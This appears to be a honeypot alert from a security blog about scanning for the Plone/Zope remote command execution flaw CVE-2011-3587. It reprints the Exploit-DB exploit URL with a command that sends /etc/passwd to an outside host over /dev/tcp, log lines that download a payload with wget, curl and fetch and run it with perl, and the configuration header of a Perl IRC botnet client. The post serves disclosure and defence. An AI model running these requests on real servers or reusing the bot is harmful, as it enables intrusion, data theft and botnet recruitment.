[Honeypot Alert] Plone and Zope Remote Command Execution Detected

We have identified active scanning for the recent Plone and Zope Remote Command Execution vulnerability. This is the vuln data from Exploit-DB:

# Exploit Title: Plone - Remote Command Execution# Date: 12/21/2011# Author: Nick Miles (www.npenetrable.com)# Tested on: 12/21/2011# CVE : CVE-2011-3587 Versions Affected (without hotfix): Plone 4.0 (through 4.0.9); Plone4.1; Plone 4.2 (a1 and a2); Zope 2.12.x and Zope 2.13.x.Versions Not Affected: Versions of Plone that use Zope other than Zope2.12.x and Zope 2.13.x. Advisory/Hotfix: http://plone.org/products/plone/security/advisories/20110928 You can execute any command on the remote Plone server with thefollowing requestif the server is Unix/Linux based (Note: you won't get returned theresults of the command): http://PLONE_SITE/p_/webdav/xmltools/minidom/xml/sax/saxutils/os/popen2?cmd= Example: Listen for a connection:$ nc -l 4040 On victim, visit:http://victim/p_/webdav/xmltools/minidom/xml/sax/saxutils/os/popen2?cmd=cat%20/etc/passwd%20%20%3E%20/dev/tcp/172.20.6.218/4040 Response:$ nc -l 4040root:x:0:0:root:/root:/bin/bashbin:x:1:1:bin:/bin:/sbin/nologindaemon:x:2:2:daemon:/sbin:/sbin/nologinadm:x:3:4:adm:/var/adm:/sbin/nologinlp:x:4:7:lp:/var/spool/lpd:/sbin/nologinsync:x:5:0:sync:/sbin:/bin/syncshutdown:x:6:0:shutdown:/sbin:/sbin/shutdownhalt:x:7:0:halt:/sbin:/sbin/haltmail:x:8:12:mail:/var/spool/mail:/sbin/nologinuucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologinoperator:x:11:0:operator:/root:/sbin/nologingames:x:12:100:games:/usr/games:/sbin/nologingopher:x:13:30:gopher:/var/gopher:/sbin/nologinftp:x:14:50:FTP User:/var/ftp:/sbin/nologinnobody:x:99:99:Nobody:/:/sbin/nologinvcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologinsaslauth:x:499:499:"Saslauthd user":/var/empty/saslauth:/sbin/nologinpostfix:x:89:89::/var/spool/postfix:/sbin/nologinsshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologinntp:x:38:38::/etc/ntp:/sbin/nologintcpdump:x:72:72::/:/sbin/nologinapache:x:48:48:Apache:/var/www:/sbin/nologinmysql:x:27:27:MySQL Server:/var/lib/mysql:/bin/bashplone:x:500:500::/home/plone:/bin/false

Here are example scans from our honeypot logs:

200.68.11.34 - - [27/Dec/2011:04:44:54 +0300] "GET //p_/webdav/xmltools/minidom/xml/sax/saxutils/os/popen2?cmd=cd%20/tmp/;wget%20--output-document%20/tmp/ieh1%20http://202.28.76.20/ieh1 HTTP/1.0" 404 33728 "-" "Made by ZmEu @ WhiteHat Team - www.whitehat.ro"200.68.11.34 - - [27/Dec/2011:04:45:01 +0300] "GET //p_/webdav/xmltools/minidom/xml/sax/saxutils/os/popen2?cmd=wget%20--output-document%20/tmp/ieh1%20http://202.28.76.20/ieh1 HTTP/1.0" 404 33728 "-" "Made by ZmEu @ WhiteHat Team - www.whitehat.ro"200.68.11.34 - - [27/Dec/2011:04:45:09 +0300] "GET //p_/webdav/xmltools/minidom/xml/sax/saxutils/os/popen2?cmd=cd%20/tmp/;wget%20http://202.28.76.20/ieh1 HTTP/1.0" 404 33728 "-" "Made by ZmEu @ WhiteHat Team - www.whitehat.ro"200.68.11.34 - - [27/Dec/2011:04:45:15 +0300] "GET //p_/webdav/xmltools/minidom/xml/sax/saxutils/os/popen2?cmd=cd%20/tmp/;curl%20-O%20http://202.28.76.20/ieh1 HTTP/1.0" 404 33728 "-" "Made by ZmEu @ WhiteHat Team - www.whitehat.ro"200.68.11.34 - - [27/Dec/2011:04:45:16 +0300] "GET //p_/webdav/xmltools/minidom/xml/sax/saxutils/os/popen2?cmd=cd%20/tmp/;fetch%20http://202.28.76.20/ieh1 HTTP/1.0" 404 33728 "-" "Made by ZmEu @ WhiteHat Team - www.whitehat.ro"200.68.11.34 - - [27/Dec/2011:04:45:29 +0300] "GET //p_/webdav/xmltools/minidom/xml/sax/saxutils/os/popen2?cmd=perl%20/tmp/ieh1 HTTP/1.0" 404 33728 "-" "Made by ZmEu @ WhiteHat Team - www.whitehat.ro"200.68.11.34 - - [27/Dec/2011:04:45:35 +0300] "GET //p_/webdav/xmltools/minidom/xml/sax/saxutils/os/popen2?cmd=perl%20/tmp/ieh1 HTTP/1.0" 404 33728 "-" "Made by ZmEu @ WhiteHat Team - www.whitehat.ro"200.68.11.34 - - [27/Dec/2011:04:45:36 +0300] "GET //p_/webdav/xmltools/minidom/xml/sax/saxutils/os/popen2?cmd=perl%20/tmp/ieh1 HTTP/1.0" 404 33728 "-" "Made by ZmEu @ WhiteHat Team - www.whitehat.ro"200.68.11.34 - - [27/Dec/2011:05:45:18 +0400] "GET //p_/webdav/xmltools/minidom/xml/sax/saxutils/os/popen2?cmd=perl%20ieh1 HTTP/1.0" 404 33728 "-" "Made by ZmEu @ WhiteHat Team - www.whitehat.ro"200.68.11.34 - - [27/Dec/2011:05:45:22 +0400] "GET //p_/webdav/xmltools/minidom/xml/sax/saxutils/os/popen2?cmd=perl%20/tmp/ieh1 HTTP/1.0" 404 33728 "-" "Made by ZmEu @ WhiteHat Team - www.whitehat.ro"200.68.11.34 - - [27/Dec/2011:05:45:28 +0400] "GET //p_/webdav/xmltools/minidom/xml/sax/saxutils/os/popen2?cmd=perl%20/tmp/ieh1 HTTP/1.0" 404 33728 "-" "Made by ZmEu @ WhiteHat Team - www.whitehat.ro"

The initial requests are attempting to download the following file using wget and curl - http://202.28.76.20/ieh1 which is an IRC botnet client:

#!/usr/bin/perl##   # #######  #######  #   #  ########  #     #  ######### #        #        #  #   #         ##    #     # # #        #        # #    #         # #   #     ## ####     #######  ##     ####      #  #  #     ## #              #  # #    #         #   # #     ## #              #  #  #   #         #    ##     ## #######  #######  #   #  ########  #     #     ############# CONFIGURACAO ############my $processo = '/usr/sbin/httpd -DL';$servidor='80.86.91.80' unless $servidor;my $porta='6667';my @canais=("#pma");my @adms=("andrew","invi","ssa","ssd","sinaia","old","iasul`");# Anti Flood ( 6/3 Recomendado )my $linas_max=10;my $sleep=3;my $nick =("pma");my $ircname =("a-hack");my $realname =("a-hack");my $acessoshell = 1;######## Stealth ShellBot ##########my $prefixo = "!all";my $estatisticas = 0;my $pacotes = 1;####################################--SNIP--

All requests has the same User-Agent string value:

"Made by ZmEu @ WhiteHat Team - www.whitehat.ro"